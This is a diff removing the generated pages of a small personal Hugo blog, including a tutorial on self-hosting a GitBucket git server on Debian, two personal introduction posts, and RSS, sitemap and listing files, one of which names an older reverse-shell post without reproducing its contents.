A Git-Server Setup In Minutes
<a class="heading-link" href="#a-git-server-setup-in-minutes">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h1>
<p>Sometimes I wish I had other hobbies then just trying out new stuff I discovered online.</p>
<p>For Some strange reason I felt the need to set up my own git server - because who doesn&rsquo;t need an own server for the two or three projects you keep on github?
I looked around and searched for some solutions that would fit my needs.</p>
<p>My requirements were:</p>
<ul>
<li>Easy setup</li>
<li>Very Low System requirements for the host</li>
<li>Account management</li>
<li>Private and Public Repos</li>
<li>Open Source</li>
</ul>
<h2 id="the-possibilities">
The Possibilities
<a class="heading-link" href="#the-possibilities">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<p>There were multiple solutions to choose from.</p>
<p>The first one was <a href="https://about.gitlab.com/install/">GitLab Core</a>. <a href="https://about.gitlab.com">GitLab</a> is widely know and a nice alternative to <a href="https://github.com/">GitHub</a>. But GitLab core does require some more System resources then my current Server has and so I ruled it out. It is good for bigger companies but I just needed something small.</p>
<p><a href="https://gitea.io/en-us/">Gitea</a> was the next thing I came across. It checks all the boxes: lightweight, simple install, Open Source, etc. I downloaded it but had trouble getting it to run with my current database without exposing my database port to the internet and that is a big No. I don&rsquo;t want to open any more ports in my firewall then I need to.</p>
<p>Here is where <a href="https://gitbucket.github.io/">GitBucket</a> (not to be confused with ATLASSIANs <a href="https://bitbucket.org/">Bitbucket</a>) came into play. It has similar features as Gitea but I was able to set it up exactly how I wanted to.</p>
<p>So now <a href="https://git.n0x.io/">git.n0x.io</a> is a thing!</p>
<h2 id="setting-up-gitbucket">
Setting up GitBucket
<a class="heading-link" href="#setting-up-gitbucket">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<h3 id="prerequirements">
Prerequirements
<a class="heading-link" href="#prerequirements">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h3>
<p>Just FYI I am running a little Debian 9 vServer so you might need to adapt the commands and changes to your system - which should be self-explanatory ;)</p>
<p>GitBucket is mostly written in Scala so we firstly need to install openJDK on our Server to run it.</p>
<pre><code>sudo apt update
sudo apt install openjdk-11-jre
</code></pre>
<p>After installing the JRE I created a user account on which GitBucket should run. This way we make sure that I we do not grant to much privileges to GitBucket - it only gets the minimal things it needs to run</p>
<pre><code>sudo adduser --system gitbucket
</code></pre>
<p>The <code>--system</code> parameter creates a systemuser account which mean a user that has no shell so we can&rsquo;t log into it the normal <code>su</code> way. To login to the new user use the following command:</p>
<pre><code>sudo su - gitbucket -s /bin/bash
</code></pre>
<p>With <code>-s /bin/bash</code> we provide a shell to the user so we don&rsquo;t get logged out immediately.</p>
<p>Now we download the <a href="https://github.com/gitbucket/gitbucket/releases/">latest version</a> of BitBucket (in my case 4.32.0) from GitHub to our local home.</p>
<pre><code>cd ~
wget https://github.com/gitbucket/gitbucket/releases/download/4.32.0/gitbucket.war
</code></pre>
<h3 id="running-gitbucket">
Running GitBucket
<a class="heading-link" href="#running-gitbucket">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h3>
<p>That is pretty much it. Now we can run GitBucket.war for the first time. There are multiple parameters you can specify (<a href="https://github.com/gitbucket/gitbucket#installation">See the official installation guide</a>) but for now we stick with just specifying the port we want GitBucket to run on initially</p>
<pre><code>java -jar gitbucket.war --port=8080
</code></pre>
<p>If you have a firewall set up like I do, you of course need to open up the port you specified. For example if you use iptables:</p>
<pre><code>sudo iptables -A INPUT -p tcp -m tcp --dport 8080 -j ACCEPT
</code></pre>
</div>
<footer>
</footer>
</article>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,242 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="Hello World! Hello there and welcome on n0x.io!
I&rsquo;m _N0x. I&rsquo;m 20 years old and &ldquo;Fachinformatiker für Anwendungsentwicklung&rdquo;. I live in germany and Love tinkering with PCs and Software.
Thanks for stopping by ;)">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="HelloWorld"/>
<meta name="twitter:description" content="Hello World! Hello there and welcome on n0x.io!
I&rsquo;m _N0x. I&rsquo;m 20 years old and &ldquo;Fachinformatiker für Anwendungsentwicklung&rdquo;. I live in germany and Love tinkering with PCs and Software.
Thanks for stopping by ;)"/>
<meta property="og:title" content="HelloWorld" />
<meta property="og:description" content="Hello World! Hello there and welcome on n0x.io!
I&rsquo;m _N0x. I&rsquo;m 20 years old and &ldquo;Fachinformatiker für Anwendungsentwicklung&rdquo;. I live in germany and Love tinkering with PCs and Software.
Thanks for stopping by ;)" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://n0x.io/posts/helloworld/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2018-01-08T20:35:40&#43;01:00" />
<meta property="article:modified_time" content="2018-01-08T20:35:40&#43;01:00" />
<title>
HelloWorld · n0x.io
</title>
<link rel="canonical" href="https://n0x.io/posts/helloworld/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://pb.n0x.io/">PrivatBin</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container post">
<article>
<header>
<div class="post-title">
<h1 class="title">
<a class="title-link" href="https://n0x.io/posts/helloworld/">
HelloWorld
</a>
</h1>
</div>
<div class="post-meta">
<div class="date">
<span class="posted-on">
<i class="fa fa-calendar" aria-hidden="true"></i>
<time datetime='2018-01-08T20:35:40&#43;01:00'>
January 8, 2018
</time>
</span>
<span class="reading-time">
<i class="fa fa-clock-o" aria-hidden="true"></i>
One-minute read
</span>
</div>
<div class="authors">
<i class="fa fa-user" aria-hidden="true"></i>
<a href="https://n0x.io/authors/_n0x/">_N0x</a></div>
</div>
</header>
<div>
<h1 id="hello-world">
Hello World!
<a class="heading-link" href="#hello-world">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h1>
<p>Hello there and welcome on n0x.io!</p>
<p>I&rsquo;m _N0x. I&rsquo;m 20 years old and &ldquo;Fachinformatiker für Anwendungsentwicklung&rdquo;.
I live in germany and Love tinkering with PCs and Software.</p>
<p>Thanks for stopping by ;)</p>
</div>
<footer>
</footer>
</article>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,265 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="Hello World! Again! Hey there! Its me again.
It has been some time since I wrote a new article in here so I thought Id state an update on me. In my first post I talked a little about me. By now some time went by and some things have changed - not that I wrote much about me to begin with.
From full time job to becoming a student Im now 23 years old and just started my 4th semester at university after deciding that I wanted to study something computer science related.">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Hello World! Again!"/>
<meta name="twitter:description" content="Hello World! Again! Hey there! Its me again.
It has been some time since I wrote a new article in here so I thought Id state an update on me. In my first post I talked a little about me. By now some time went by and some things have changed - not that I wrote much about me to begin with.
From full time job to becoming a student Im now 23 years old and just started my 4th semester at university after deciding that I wanted to study something computer science related."/>
<meta property="og:title" content="Hello World! Again!" />
<meta property="og:description" content="Hello World! Again! Hey there! Its me again.
It has been some time since I wrote a new article in here so I thought Id state an update on me. In my first post I talked a little about me. By now some time went by and some things have changed - not that I wrote much about me to begin with.
From full time job to becoming a student Im now 23 years old and just started my 4th semester at university after deciding that I wanted to study something computer science related." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://n0x.io/posts/helloworldagain/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-05-26T11:14:07&#43;02:00" />
<meta property="article:modified_time" content="2021-05-26T11:14:07&#43;02:00" />
<title>
Hello World! Again! · n0x.io
</title>
<link rel="canonical" href="https://n0x.io/posts/helloworldagain/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://pb.n0x.io/">PrivatBin</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container post">
<article>
<header>
<div class="post-title">
<h1 class="title">
<a class="title-link" href="https://n0x.io/posts/helloworldagain/">
Hello World! Again!
</a>
</h1>
</div>
<div class="post-meta">
<div class="date">
<span class="posted-on">
<i class="fa fa-calendar" aria-hidden="true"></i>
<time datetime='2021-05-26T11:14:07&#43;02:00'>
May 26, 2021
</time>
</span>
<span class="reading-time">
<i class="fa fa-clock-o" aria-hidden="true"></i>
5-minute read
</span>
</div>
<div class="authors">
<i class="fa fa-user" aria-hidden="true"></i>
<a href="https://n0x.io/authors/_n0x/">_N0x</a></div>
</div>
</header>
<div>
<h2 id="hello-world-again">
Hello World! Again!
<a class="heading-link" href="#hello-world-again">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<p>Hey there! Its me again.</p>
<p>It has been some time since I wrote a new article in here so I thought Id state an update on me. In my <a href="https://n0x.io/posts/helloworld/" title="first post">first post</a> I talked a little about me. By now some time went by and some things have changed - not that I wrote much about me to begin with.</p>
<h3 id="from-full-time-job-to-becoming-a-student">
From full time job to becoming a student
<a class="heading-link" href="#from-full-time-job-to-becoming-a-student">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h3>
<p>Im now 23 years old and just started my 4th semester at university after deciding that I wanted to study something computer science related. After finishing my apprenticeship in 2018 I worked as a software developer for little over a year. In August 2019 I started my dual study in Software Technology (B.Sc.). A dual study is a studying model here in Germany that lets you go to university full time during the semester, but you are still hired and paid by a company. Between semesters you have no real semester break as you go to work full time at your partnering company. This is to collect as much real-life experience as possible during the study. During these phases or working - could translate as “practical phases” - you work on a project at your company for what you need to write a documentation. This documentation in return will be evaluated by the University and credit points awarded accordingly. Oh and all classes are mandatory and you can only choose some of them. The classes at university are quite small with about 25 people max. This means the whole feeling of university is more closely to that of going to school here in Germany - for better or worse. But it means you actually have a face in university and that networking between students and professors and other lecturers is quite easy.</p>
<p>As you can see the whole dual study thing is a very interwoven mesh between theory - in form of what is thought at University - and practice - in form of a company you work for. I think the concept is quite neat even if it means you dont have the “luxurious life” or a regular university student. Free time is rare but well worth the effort and I can only recommend this model to anyone who wants to educate themselves while getting some hands-on-experiance!</p>
<h3 id="linux---bane-of-my-existence">
Linux - bane of my existence
<a class="heading-link" href="#linux---bane-of-my-existence">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h3>
<p>Ah Linux. My love. My hated enemy. I feel like the relationship with a lot of people towards Linux is a sort of love-hate-relationship. There are times where I spend hours digging through config files, compiling, changing and tinkering just to get the smallest, tiniest change done. But damn does it feel good once you take control of things and understand how things work and interact with each other. Truly rewarding and so many things to learn!
In the beginning of 2021 I decided to finally cut my ties with windoot and fully switch to Linux. I had been running Linux on my servers and laptop for some time now and had played around with all the fun Linux things. My current config is build on DWM and Arch Linux and Ive been enjoying it greatly. I switched to Linux on my desktop system as well after noticing that I barely played any games on it anymore. And to my surprise that went fairly well and I havent felt the need to go back to Windows ever since. Im still using it at work but not much I can do about that. Gaming works fairly well on Linux and I even got games like Battle Field 4 to run - with anticheat! I dont think its something I can recommend to a heavy gamer but for simple browsing and such Linux seems to come along nicely - and for professionals around the computer science field even more ;)</p>
<h3 id="wörk-wörk-wörk">
Wörk wörk wörk
<a class="heading-link" href="#w%c3%b6rk-w%c3%b6rk-w%c3%b6rk">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h3>
<p>Combining both of the above topics is my current place of work. Ive developed quite the interest in tinkering with Linux and tweaking it and it translates surprisingly well to my daily work - if Im not at university of course. Im now responsible for creating and maintaining firmware build on the popular embedded systems Linux Yocto. Im also tasked with some security aspects regarding development at work buuuut of course Im not spilling anything of that on here. The symbiosis of my hobbies and my work is fascinating. I can basically deploy the skills I learned athome at my workplace and in return learn new stuff there to use at home. A non-vicious vicious circle if you want. And that makes me really love my workplace and the work I do even if Im just a student.
And while Im rambling on here I have to say that its a little sad to see how many people are not happy at their workplace or the work they do. I can only recommend to every single person out there to go and try to find a job they like. Its such a valuable thing to have in life - or maybe thats just my inner German coming through. But oh well.</p>
<p>So much for a little update…</p>
</div>
<footer>
</footer>
</article>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,209 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="Just some small blog">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Posts"/>
<meta name="twitter:description" content="Just some small blog"/>
<meta property="og:title" content="Posts" />
<meta property="og:description" content="Just some small blog" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://n0x.io/posts/" />
<title>
Posts · n0x.io
</title>
<link rel="canonical" href="https://n0x.io/posts/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="alternate" type="application/rss+xml" href="https://n0x.io/posts/index.xml" title="n0x.io" />
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://pb.n0x.io/">PrivatBin</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container list">
<h1 class="title">
<a class="title-link" href="https://n0x.io/posts/">
Posts
</a>
</h1>
<ul><li>
<span class="date">May 26, 2021</span>
<a class="title" href="https://n0x.io/posts/helloworldagain/">Hello World! Again!</a>
</li>
<li>
<span class="date">July 2, 2020</span>
<a class="title" href="https://n0x.io/posts/gitbucket/">Git in minutes</a>
</li>
<li>
<span class="date">January 20, 2018</span>
<a class="title" href="https://n0x.io/posts/digispark_reverseshell/">Digispark Reverse-Shell</a>
</li>
<li>
<span class="date">January 8, 2018</span>
<a class="title" href="https://n0x.io/posts/helloworld/">HelloWorld</a>
</li>
</ul>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,52 +0,0 @@
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Posts on n0x.io</title>
<link>https://n0x.io/posts/</link>
<description>Recent content in Posts on n0x.io</description>
<generator>Hugo -- gohugo.io</generator>
<language>de</language>
<lastBuildDate>Wed, 26 May 2021 11:14:07 +0200</lastBuildDate><atom:link href="https://n0x.io/posts/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>Hello World! Again!</title>
<link>https://n0x.io/posts/helloworldagain/</link>
<pubDate>Wed, 26 May 2021 11:14:07 +0200</pubDate>
<guid>https://n0x.io/posts/helloworldagain/</guid>
<description>Hello World! Again! Hey there! Its me again.
It has been some time since I wrote a new article in here so I thought Id state an update on me. In my first post I talked a little about me. By now some time went by and some things have changed - not that I wrote much about me to begin with.
From full time job to becoming a student Im now 23 years old and just started my 4th semester at university after deciding that I wanted to study something computer science related.</description>
</item>
<item>
<title>Git in minutes</title>
<link>https://n0x.io/posts/gitbucket/</link>
<pubDate>Thu, 02 Jul 2020 00:00:00 +0200</pubDate>
<guid>https://n0x.io/posts/gitbucket/</guid>
<description>A Git-Server Setup In Minutes Sometimes I wish I had other hobbies then just trying out new stuff I discovered online.
For Some strange reason I felt the need to set up my own git server - because who doesn&amp;rsquo;t need an own server for the two or three projects you keep on github? I looked around and searched for some solutions that would fit my needs.</description>
</item>
<item>
<title>Digispark Reverse-Shell</title>
<link>https://n0x.io/posts/digispark_reverseshell/</link>
<pubDate>Sat, 20 Jan 2018 17:03:46 +0100</pubDate>
<guid>https://n0x.io/posts/digispark_reverseshell/</guid>
<description>Reverse Shell for 1,50€ - Digispark instead of USB Rubber Ducky Some of you might already have heard of it: The USB Rubber Ducky by Hak5. A very special USB-Device: Not only a mass storage device but any usb input-device you want it to be. Because of this you can use it for some very nice ways to get your payload onto a victims PC. The Rubber Ducky is freely programmable so there are no limits on what you can do with it.</description>
</item>
<item>
<title>HelloWorld</title>
<link>https://n0x.io/posts/helloworld/</link>
<pubDate>Mon, 08 Jan 2018 20:35:40 +0100</pubDate>
<guid>https://n0x.io/posts/helloworld/</guid>
<description>Hello World! Hello there and welcome on n0x.io!
I&amp;rsquo;m _N0x. I&amp;rsquo;m 20 years old and &amp;ldquo;Fachinformatiker für Anwendungsentwicklung&amp;rdquo;. I live in germany and Love tinkering with PCs and Software.
Thanks for stopping by ;)</description>
</item>
</channel>
</rss>

@ -1 +0,0 @@
<!DOCTYPE html><html><head><title>https://n0x.io/posts/</title><link rel="canonical" href="https://n0x.io/posts/"/><meta name="robots" content="noindex"><meta charset="utf-8" /><meta http-equiv="refresh" content="0; url=https://n0x.io/posts/" /></head></html>

@ -1,31 +0,0 @@
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xhtml="http://www.w3.org/1999/xhtml">
<url>
<loc>https://n0x.io/authors/_n0x/</loc>
<lastmod>2021-05-26T11:14:07+02:00</lastmod>
</url><url>
<loc>https://n0x.io/authors/</loc>
<lastmod>2021-05-26T11:14:07+02:00</lastmod>
</url><url>
<loc>https://n0x.io/posts/helloworldagain/</loc>
<lastmod>2021-05-26T11:14:07+02:00</lastmod>
</url><url>
<loc>https://n0x.io/</loc>
<lastmod>2021-05-26T11:14:07+02:00</lastmod>
</url><url>
<loc>https://n0x.io/posts/</loc>
<lastmod>2021-05-26T11:14:07+02:00</lastmod>
</url><url>
<loc>https://n0x.io/posts/gitbucket/</loc>
<lastmod>2020-07-02T00:00:00+02:00</lastmod>
</url><url>
<loc>https://n0x.io/posts/digispark_reverseshell/</loc>
<lastmod>2018-01-20T17:03:46+01:00</lastmod>
</url><url>
<loc>https://n0x.io/posts/helloworld/</loc>
<lastmod>2018-01-08T20:35:40+01:00</lastmod>
</url><url>
<loc>https://n0x.io/about/</loc>
</url>
</urlset>

@ -1,181 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="Just some small blog">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Tags"/>
<meta name="twitter:description" content="Just some small blog"/>
<meta property="og:title" content="Tags" />
<meta property="og:description" content="Just some small blog" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://n0x.io/tags/" />
<title>Tags · n0x.io</title>
<link rel="canonical" href="https://n0x.io/tags/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="alternate" type="application/rss+xml" href="https://n0x.io/tags/index.xml" title="n0x.io" />
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container taxonomy">
<h1 class="title">
<a class="title-link" href="https://n0x.io/tags/">Tags</a>
</h1>
<ul>
</ul>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,10 +0,0 @@
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Tags on n0x.io</title>
<link>https://n0x.io/tags/</link>
<description>Recent content in Tags on n0x.io</description>
<generator>Hugo -- gohugo.io</generator>
<language>de</language><atom:link href="https://n0x.io/tags/index.xml" rel="self" type="application/rss+xml" />
</channel>
</rss>
Loading…
Cancel
Save